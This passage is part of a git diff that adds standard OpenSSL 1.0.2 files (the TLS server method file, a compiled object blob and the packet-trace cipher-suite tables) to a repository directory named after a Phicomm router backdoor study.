index 0000000000000000000000000000000000000000..89d90fa479d6a14a18040d8f8d979c5665c29abb
GIT binary patch
literal 3480
zcmbtWU2GIp6u#5prz*^B4Vq0bWKlFl=(x*Iqy*|t*)6kXwS~5Zzd9`2fi~`+v$LcK
zp&RK!hh+^f1~ESRWK596ZW=UYP0?zMNmWF{i#}*#!V5nJt0Af9%-m~dXSZPDN$#9`
zzk9xO&YXMZ?hc2e9Ss~um~f<x%&izoi1*>SdC-~$i9nW;JK~DJBj$`!xNGcCil_3h
zC6>o`Eg+=zui+J4mpZ{&I8X_EHSsLWE-!=q-;o}u?3oOXwnd7gc~~i>4o)$rl+r~n
zFvYTo4(_}kDdurkEa!1OTQM8PF}Fz!+S{#|U&~#E?}k@e{x5aG*2LPXAXEHvV1A=j
zEDPqBv!Atoo4cwMFQCiK1@ve<Wm9+5qc($CpmJk%v{b;Pl+tldEKf(xFRc6vmE7c1
z;XT;EjI6Zw?CrBMv&$iljKGFcyqpJh`V@u>iRE+WL5t;?5ci|IK5ME{$NGf0>Cr_G
zs*qJbv3wB&DBMjb;chF0iIJeDjw+6#4HOf1N+FJOmQ#L3Hm}LOa!<s(*Q=P{bSuSk
zn7Lx!IsGP0{sTMtX_@=M2#-{9UZwOHn2?E^Xjs~cbE`O!;>fBzEb`;XAajPdVC6In
z7w!%}={UZYsv1m%iFJN{vCNmcxKQiu-1l<p=f=~HQ>$U%v4sP_-Z=VF@xxVlj5j-}
zm_LWb@)*8Gq%`IQ6*X^LnabuBILQmLSbiH*h27ntUMy`{PfyvP=~*pO6U<7lNuFy2
z`BQ9%y&?0LK6#(qC%-zmQX9%>aYO4@6I#l5?3gdx(w1G{(w5P+!-MHuR*feHwUnVA
z983*n2W&H91XNv1X@{gZc_2Tl>4!DFnoqWG+qT))+<PFGGIG9FX}#oc2|S;(mVx8z
z{E~meY8!@ZErGWt9vBN@Y=60zG!RljjE8}OA1(^_#!kWwdAQ|E7B`-ScSZaOYX{C5
zwJLb_35{eGOgB*cUDRR0bFx7eyeIgu;A=P|cxAyO3ysL%NA1Q?XKel!m>LxC!<u#o
zp0^spg15xC3%)Z8LPGP&g(1OzViCWU6PiPUuU+uA3!Zj}eLq203&^e6dNzFBn-6Qi
zs!+}1!Baiqtt!^;@MLi<2nbK==ggCbYV4O-2%b{4G+E1qWMef<9;bNFh2xSZi)zs2
zfIRA`gLS5Wy#NFI!!5l4)WhR|qaVh%dH^tU9{aP@Uc>_e8M77n7&Q91LUF4X0J{#O
zUR>v=BSp9Q2|NP$SVywigc|GbrytyamPn-SuPkj0#tco>h76)^k9M}pQMI$9qdVNA
z_Q>tguu8%^cdD73p=!FG)-6Aon4Z<{>nW)v<H^jwLG7=!eo#!zc6dLl&Wx7o?v92A
zH7pJLwy*<5824svIggtlZv3hZ*WiCRaO@%Gr-#<t?FTOg6ja!q%zlXj$G-{;Z=yK*
zS?0i3JM15E;2Ryd)6eF4{Ooez&N`f)2mi!@JKy*EJouju-09y3Iiuh<HL=#4tmhog
z`hUL*XMH~8!dagaDSISo#14QqbXyOwnXV;bl7a0i^~a1Dkq%_DMAFl^K=XhE9Uo68
zlkmGjq*U6_B)HOBvPLZa8eJbs<)n<B&S<)E1gPjx8&D7Gv82^qG^zige89yPa^EmP
zz))7Yu2kA?_9i^>9>Sgp!f?tsy+ZSpfW3oLc7uAU@iP>6g&{FFK<(Y}*HWKu^Z&{Z
z(D>`9f2J6p^##LOe5Ql2fpb4Ip!yn3XpIYJJf<VC&*n~34vShx+_t;H221ViZKO3)
zz7H1;VfAOw>o7r|ZhkZ6f5Z%_cJmW}*E|1B^e1sY<>C1w#Q5y|>%~UOPc;4vePR4P
lU0R2aKHX;z5SgY8{TnVE;;tXwE%o^C(EN`&xHxt5{{e(5W0C*>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_srvr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_srvr.c
new file mode 100644
index 0000000..8c6b3df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_srvr.c
@@ -0,0 +1,92 @@
+/* ssl/t1_srvr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+
+static const SSL_METHOD *tls1_get_server_method(int ver);
+static const SSL_METHOD *tls1_get_server_method(int ver)
+{
+    if (ver == TLS1_2_VERSION)
+        return TLSv1_2_server_method();
+    if (ver == TLS1_1_VERSION)
+        return TLSv1_1_server_method();
+    if (ver == TLS1_VERSION)
+        return TLSv1_server_method();
+    return NULL;
+}
+
+IMPLEMENT_tls_meth_func(TLS1_2_VERSION, TLSv1_2_server_method,
+                        ssl3_accept,
+                        ssl_undefined_function,
+                        tls1_get_server_method, TLSv1_2_enc_data)
+
+    IMPLEMENT_tls_meth_func(TLS1_1_VERSION, TLSv1_1_server_method,
+                        ssl3_accept,
+                        ssl_undefined_function,
+                        tls1_get_server_method, TLSv1_1_enc_data)
+
+    IMPLEMENT_tls_meth_func(TLS1_VERSION, TLSv1_server_method,
+                        ssl3_accept,
+                        ssl_undefined_function,
+                        tls1_get_server_method, TLSv1_enc_data)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_srvr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_srvr.o
new file mode 100644
index 0000000000000000000000000000000000000000..5b29c044016e1ebe01b0ee11309b79d61b4d8747
GIT binary patch
literal 6216
zcmd^@O^g&p6vu0J7Fh*ZL_rkA*+q0g>CCVjVLh0ME3$`;!4DEmG)-?$?as(d&!oF%
z+2sHdFPj*XJ>tQLH#}+LLE?$Xg@cLQ<cKG^crbc0Bx}9yS2O==x-NR;B|Y!euj<uT
z|NCn$o>+Kuq*M~dO5!y!EEy`q`V+&ro`!WXE_R5&#`pg-|M?aomp02~A=JS^afFI{
zE^U^yXZRyEoF6~&(+x;;#=0%#KFCIU_#hie>VdG6b91j&rcN*RBh|0WdedI@NbOiZ
zE!Hj^t$Nj&LmAF?V^q7H`k*WC<Xfl3h!EF_ne8%{Yw7$uqO`iRv~T;?u?>A;Q_eH`
zAe+rx%Bmc12lhq*dq2mxc%P$t$f)>p^S%lV%7u3r;%4@CR$2Fyw{04XKtE<JlbV-k
zSM-LE-OZes(>~>Vb2GeQIJYyLisf{7xdL2Sj6rD_mc_%v0z_r;2$Y6lS!^8^IQmrk
zU3#WwJ?4CT!TbcbGyGfTZ|C?8U8ZxLx1TjA;=elhZw~&4gO9StbhTwW9DJ{XA8_!R
zgTL<JA2|5O4u0OjKXdS}9Q+#x|G~k3aq!<A{BH-}qIF+%es??gVF#ae@Y4?7bnuG~
zzTx0P)%+x0iM>#$c2e_~rScOQugKW%NY(5%#Cr?xuGIXaHuW2U3cT9P%&{sr(A{9#
zu)z#Ba8w^J9-z3_qOP)eNAg@2gl!qbS-2ESDUzf;?FV5fdx~PeA2sAsE0PU=sUL-^
z)s3<yu?!kn)RXdT7M+V*ihD?!ebwlm8#IpOa#ytiQyt3z@WZAIxdYnGj!cqZnY*D;
z{KYjT6Bq$Oqm}dm6*m2#E#q{?(|)MpcGf&pt5Ble!&a}U&(-3Z9#*eAU2U)L;4*5o
zqUEen)bDUIPi5F!wtIS;f__{1s@0L*zT&NyQJ9`u>IC+3rQ6DHXc)BHi$Qo6CY(;+
z!kM^g{-9f<wgKR~nz?gp8K-ysd-{4L+mpHU@k398dt81g&o?ux=Q;PYkmp=B&)>ng
z+>d!8QTk)tmYlg45Z?uSFUQ0m2VMbg-XRE00pHCrxhin8c0$L2Kglt<I>$7wnFFDD
z;7@T(?iBE+ft!7xe)a)B!!dF5o<pb!{8^64^?>gOz6$&~;GY1m0AB|_0el1aB=F0?
z4*<Uc{CVJ4fgc3^9q<=`Ujt5BF?O8;+MgE<)cz*$Dd4w&9|C?G_+j98fE&#d8lwTV
zk+bv(+|nm-OP|0keFC@i3Ea{ra7&-S_og$>e&&H&`UGz26S$>M;FdmtTlxfU=@Yo6
zPv8}p|2psq;Pg#EM$XbFa7&-SEqwyF^a<S3CvZ!jz%6|Oe>t6T_HzrkrBC3NK7m{M
z<VjGqrBC3NK7m{M1a9dQxTR0vmOg=7`UGz26S$>M;FdmtTlxfU=@Yo6PvDk5fm`|n
zUV-zt4txSQy(f~<d6`V3?B_CYOP|0keFC@i3Ea{ra1PUfuLHOA3H%7m^A>PRpTI4B
z0!MvTxKFC)CMlW8@mVg<=eYT9{4mGOccbu<wT=oFwO4WGn<k27JMffTRl=j!Y~d{?
ziSSaIzIN-#i@U-LyPb}VbgQVVq^JLtIFcy+!o}s~sPFaSZco2Pu5q?(`b%-pkvymW
z<0?9tH1bfclRB3_%5iFoM%TcoKI#Z{e0*C5%yXQ+yD4`p!-IDi(hl)5bK|}=LC)vL
zr+XUp`Cs#2(YZzAU(uZGE{aB%D+Ix6IxbrOO<w;Ue&MC{Z_!77{d1bp_*H$Nt@DCV
z%T#aHZ~Ou<%>O>WAzW$lOk2`5O)<AjagFmUrXhPXe}k0{sLy=<ZO(6+hV1kCUCoR3
z?<zkW&Tt;>AN?C-^36TGXlzQUQ>WTav42#@JM@vyr*Dm-t=iy*U*{H<-#>ch73Gid
ML+paCN6Y8`3roVl!vFvP

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_trce.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_trce.c
new file mode 100644
index 0000000..c5e21df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_trce.c
@@ -0,0 +1,1266 @@
+/* ssl/t1_trce.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2012 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include "ssl_locl.h"
+
+#ifndef OPENSSL_NO_SSL_TRACE
+
+/* Packet trace support for OpenSSL */
+
+typedef struct {
+    int num;
+    const char *name;
+} ssl_trace_tbl;
+
+# define ssl_trace_str(val, tbl) \
+        do_ssl_trace_str(val, tbl, sizeof(tbl)/sizeof(ssl_trace_tbl))
+
+# define ssl_trace_list(bio, indent, msg, msglen, value, table) \
+        do_ssl_trace_list(bio, indent, msg, msglen, value, \
+         table, sizeof(table)/sizeof(ssl_trace_tbl))
+
+static const char *do_ssl_trace_str(int val, ssl_trace_tbl *tbl, size_t ntbl)
+{
+    size_t i;
+    for (i = 0; i < ntbl; i++, tbl++) {
+        if (tbl->num == val)
+            return tbl->name;
+    }
+    return "UNKNOWN";
+}
+
+static int do_ssl_trace_list(BIO *bio, int indent,
+                             const unsigned char *msg, size_t msglen,
+                             size_t vlen, ssl_trace_tbl *tbl, size_t ntbl)
+{
+    int val;
+    if (msglen % vlen)
+        return 0;
+    while (msglen) {
+        val = msg[0];
+        if (vlen == 2)
+            val = (val << 8) | msg[1];
+        BIO_indent(bio, indent, 80);
+        BIO_printf(bio, "%s (%d)\n", do_ssl_trace_str(val, tbl, ntbl), val);
+        msg += vlen;
+        msglen -= vlen;
+    }
+    return 1;
+}
+
+/* Version number */
+
+static ssl_trace_tbl ssl_version_tbl[] = {
+    {SSL2_VERSION, "SSL 2.0"},
+    {SSL3_VERSION, "SSL 3.0"},
+    {TLS1_VERSION, "TLS 1.0"},
+    {TLS1_1_VERSION, "TLS 1.1"},
+    {TLS1_2_VERSION, "TLS 1.2"},
+    {DTLS1_VERSION, "DTLS 1.0"},
+    {DTLS1_2_VERSION, "DTLS 1.2"},
+    {DTLS1_BAD_VER, "DTLS 1.0 (bad)"}
+};
+
+static ssl_trace_tbl ssl_content_tbl[] = {
+    {SSL3_RT_CHANGE_CIPHER_SPEC, "ChangeCipherSpec"},
+    {SSL3_RT_ALERT, "Alert"},
+    {SSL3_RT_HANDSHAKE, "Handshake"},
+    {SSL3_RT_APPLICATION_DATA, "ApplicationData"},
+    {TLS1_RT_HEARTBEAT, "HeartBeat"}
+};
+
+/* Handshake types */
+static ssl_trace_tbl ssl_handshake_tbl[] = {
+    {SSL3_MT_HELLO_REQUEST, "HelloRequest"},
+    {SSL3_MT_CLIENT_HELLO, "ClientHello"},
+    {SSL3_MT_SERVER_HELLO, "ServerHello"},
+    {DTLS1_MT_HELLO_VERIFY_REQUEST, "HelloVerifyRequest"},
+    {SSL3_MT_NEWSESSION_TICKET, "NewSessionTicket"},
+    {SSL3_MT_CERTIFICATE, "Certificate"},
+    {SSL3_MT_SERVER_KEY_EXCHANGE, "ServerKeyExchange"},
+    {SSL3_MT_CERTIFICATE_REQUEST, "CertificateRequest"},
+    {SSL3_MT_CLIENT_KEY_EXCHANGE, "ClientKeyExchange"},
+    {SSL3_MT_CERTIFICATE_STATUS, "CertificateStatus"},
+    {SSL3_MT_SERVER_DONE, "ServerHelloDone"},
+    {SSL3_MT_CERTIFICATE_VERIFY, "CertificateVerify"},
+    {SSL3_MT_CLIENT_KEY_EXCHANGE, "ClientKeyExchange"},
+    {SSL3_MT_FINISHED, "Finished"},
+    {SSL3_MT_CERTIFICATE_STATUS, "CertificateStatus"}
+};
+
+/* Cipher suites */
+static ssl_trace_tbl ssl_ciphers_tbl[] = {
+    {0x0000, "SSL_NULL_WITH_NULL_NULL"},
+    {0x0001, "SSL_RSA_WITH_NULL_MD5"},
+    {0x0002, "SSL_RSA_WITH_NULL_SHA"},
+    {0x0003, "SSL_RSA_EXPORT_WITH_RC4_40_MD5"},
+    {0x0004, "SSL_RSA_WITH_RC4_128_MD5"},
+    {0x0005, "SSL_RSA_WITH_RC4_128_SHA"},
+    {0x0006, "SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5"},
+    {0x0007, "SSL_RSA_WITH_IDEA_CBC_SHA"},
+    {0x0008, "SSL_RSA_EXPORT_WITH_DES40_CBC_SHA"},
+    {0x0009, "SSL_RSA_WITH_DES_CBC_SHA"},
+    {0x000A, "SSL_RSA_WITH_3DES_EDE_CBC_SHA"},
+    {0x000B, "SSL_DH_DSS_EXPORT_WITH_DES40_CBC_SHA"},
+    {0x000C, "SSL_DH_DSS_WITH_DES_CBC_SHA"},
+    {0x000D, "SSL_DH_DSS_WITH_3DES_EDE_CBC_SHA"},
+    {0x000E, "SSL_DH_RSA_EXPORT_WITH_DES40_CBC_SHA"},
+    {0x000F, "SSL_DH_RSA_WITH_DES_CBC_SHA"},
+    {0x0010, "SSL_DH_RSA_WITH_3DES_EDE_CBC_SHA"},
+    {0x0011, "SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"},
+    {0x0012, "SSL_DHE_DSS_WITH_DES_CBC_SHA"},
+    {0x0013, "SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA"},
+    {0x0014, "SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA"},
+    {0x0015, "SSL_DHE_RSA_WITH_DES_CBC_SHA"},
+    {0x0016, "SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA"},
+    {0x0017, "SSL_DH_anon_EXPORT_WITH_RC4_40_MD5"},
+    {0x0018, "SSL_DH_anon_WITH_RC4_128_MD5"},
+    {0x0019, "SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA"},
+    {0x001A, "SSL_DH_anon_WITH_DES_CBC_SHA"},
+    {0x001B, "SSL_DH_anon_WITH_3DES_EDE_CBC_SHA"},
+    {0x001D, "SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA"},
+    {0x001E, "SSL_FORTEZZA_KEA_WITH_RC4_128_SHA"},
+    {0x001F, "TLS_KRB5_WITH_3DES_EDE_CBC_SHA"},
+    {0x0020, "TLS_KRB5_WITH_RC4_128_SHA"},
+    {0x0021, "TLS_KRB5_WITH_IDEA_CBC_SHA"},
+    {0x0022, "TLS_KRB5_WITH_DES_CBC_MD5"},
+    {0x0023, "TLS_KRB5_WITH_3DES_EDE_CBC_MD5"},
+    {0x0024, "TLS_KRB5_WITH_RC4_128_MD5"},
+    {0x0025, "TLS_KRB5_WITH_IDEA_CBC_MD5"},
+    {0x0026, "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA"},
+    {0x0027, "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA"},
+    {0x0028, "TLS_KRB5_EXPORT_WITH_RC4_40_SHA"},
+    {0x0029, "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5"},
+    {0x002A, "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5"},
+    {0x002B, "TLS_KRB5_EXPORT_WITH_RC4_40_MD5"},
+    {0x002F, "TLS_RSA_WITH_AES_128_CBC_SHA"},
+    {0x0030, "TLS_DH_DSS_WITH_AES_128_CBC_SHA"},
+    {0x0031, "TLS_DH_RSA_WITH_AES_128_CBC_SHA"},
+    {0x0032, "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"},
+    {0x0033, "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"},
+    {0x0034, "TLS_DH_anon_WITH_AES_128_CBC_SHA"},
+    {0x0035, "TLS_RSA_WITH_AES_256_CBC_SHA"},
+    {0x0036, "TLS_DH_DSS_WITH_AES_256_CBC_SHA"},
+    {0x0037, "TLS_DH_RSA_WITH_AES_256_CBC_SHA"},
+    {0x0038, "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"},
+    {0x0039, "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"},
+    {0x003A, "TLS_DH_anon_WITH_AES_256_CBC_SHA"},
+    {0x003B, "TLS_RSA_WITH_NULL_SHA256"},
+    {0x003C, "TLS_RSA_WITH_AES_128_CBC_SHA256"},
+    {0x003D, "TLS_RSA_WITH_AES_256_CBC_SHA256"},
+    {0x003E, "TLS_DH_DSS_WITH_AES_128_CBC_SHA256"},
+    {0x003F, "TLS_DH_RSA_WITH_AES_128_CBC_SHA256"},
+    {0x0040, "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"},
+    {0x0041, "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"},
+    {0x0042, "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA"},
+    {0x0043, "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA"},
+    {0x0044, "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"},
+    {0x0045, "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"},
+    {0x0046, "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA"},
+    {0x0067, "TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"},
+    {0x0068, "TLS_DH_DSS_WITH_AES_256_CBC_SHA256"},
+    {0x0069, "TLS_DH_RSA_WITH_AES_256_CBC_SHA256"},
+    {0x006A, "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"},
+    {0x006B, "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"},
+    {0x006C, "TLS_DH_anon_WITH_AES_128_CBC_SHA256"},
+    {0x006D, "TLS_DH_anon_WITH_AES_256_CBC_SHA256"},
+    {0x0084, "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"},
+    {0x0085, "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA"},
+    {0x0086, "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA"},
+    {0x0087, "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"},
+    {0x0088, "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"},
+    {0x0089, "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA"},
+    {0x008A, "TLS_PSK_WITH_RC4_128_SHA"},
+    {0x008B, "TLS_PSK_WITH_3DES_EDE_CBC_SHA"},
+    {0x008C, "TLS_PSK_WITH_AES_128_CBC_SHA"},
+    {0x008D, "TLS_PSK_WITH_AES_256_CBC_SHA"},
+    {0x008E, "TLS_DHE_PSK_WITH_RC4_128_SHA"},
+    {0x008F, "TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA"},
+    {0x0090, "TLS_DHE_PSK_WITH_AES_128_CBC_SHA"},
+    {0x0091, "TLS_DHE_PSK_WITH_AES_256_CBC_SHA"},
+    {0x0092, "TLS_RSA_PSK_WITH_RC4_128_SHA"},
+    {0x0093, "TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA"},
+    {0x0094, "TLS_RSA_PSK_WITH_AES_128_CBC_SHA"},
+    {0x0095, "TLS_RSA_PSK_WITH_AES_256_CBC_SHA"},
+    {0x0096, "TLS_RSA_WITH_SEED_CBC_SHA"},
+    {0x0097, "TLS_DH_DSS_WITH_SEED_CBC_SHA"},
+    {0x0098, "TLS_DH_RSA_WITH_SEED_CBC_SHA"},
+    {0x0099, "TLS_DHE_DSS_WITH_SEED_CBC_SHA"},
+    {0x009A, "TLS_DHE_RSA_WITH_SEED_CBC_SHA"},
+    {0x009B, "TLS_DH_anon_WITH_SEED_CBC_SHA"},
+    {0x009C, "TLS_RSA_WITH_AES_128_GCM_SHA256"},
+    {0x009D, "TLS_RSA_WITH_AES_256_GCM_SHA384"},
+    {0x009E, "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"},
+    {0x009F, "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"},
+    {0x00A0, "TLS_DH_RSA_WITH_AES_128_GCM_SHA256"},
+    {0x00A1, "TLS_DH_RSA_WITH_AES_256_GCM_SHA384"},
+    {0x00A2, "TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"},
+    {0x00A3, "TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"},
+    {0x00A4, "TLS_DH_DSS_WITH_AES_128_GCM_SHA256"},
+    {0x00A5, "TLS_DH_DSS_WITH_AES_256_GCM_SHA384"},
+    {0x00A6, "TLS_DH_anon_WITH_AES_128_GCM_SHA256"},
+    {0x00A7, "TLS_DH_anon_WITH_AES_256_GCM_SHA384"},
+    {0x00A8, "TLS_PSK_WITH_AES_128_GCM_SHA256"},
+    {0x00A9, "TLS_PSK_WITH_AES_256_GCM_SHA384"},
+    {0x00AA, "TLS_DHE_PSK_WITH_AES_128_GCM_SHA256"},
+    {0x00AB, "TLS_DHE_PSK_WITH_AES_256_GCM_SHA384"},
+    {0x00AC, "TLS_RSA_PSK_WITH_AES_128_GCM_SHA256"},
+    {0x00AD, "TLS_RSA_PSK_WITH_AES_256_GCM_SHA384"},
+    {0x00AE, "TLS_PSK_WITH_AES_128_CBC_SHA256"},
+    {0x00AF, "TLS_PSK_WITH_AES_256_CBC_SHA384"},
+    {0x00B0, "TLS_PSK_WITH_NULL_SHA256"},
+    {0x00B1, "TLS_PSK_WITH_NULL_SHA384"},
+    {0x00B2, "TLS_DHE_PSK_WITH_AES_128_CBC_SHA256"},
+    {0x00B3, "TLS_DHE_PSK_WITH_AES_256_CBC_SHA384"},
+    {0x00B4, "TLS_DHE_PSK_WITH_NULL_SHA256"},
+    {0x00B5, "TLS_DHE_PSK_WITH_NULL_SHA384"},
+    {0x00B6, "TLS_RSA_PSK_WITH_AES_128_CBC_SHA256"},
+    {0x00B7, "TLS_RSA_PSK_WITH_AES_256_CBC_SHA384"},
+    {0x00B8, "TLS_RSA_PSK_WITH_NULL_SHA256"},
+    {0x00B9, "TLS_RSA_PSK_WITH_NULL_SHA384"},
+    {0x00BA, "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256"},
+    {0x00BB, "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256"},
+    {0x00BC, "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256"},
+    {0x00BD, "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256"},
+    {0x00BE, "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"},
+    {0x00BF, "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256"},
+    {0x00C0, "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256"},
+    {0x00C1, "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256"},
+    {0x00C2, "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256"},
+    {0x00C3, "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256"},
+    {0x00C4, "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256"},
+    {0x00C5, "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256"},
+    {0x00FF, "TLS_EMPTY_RENEGOTIATION_INFO_SCSV"},
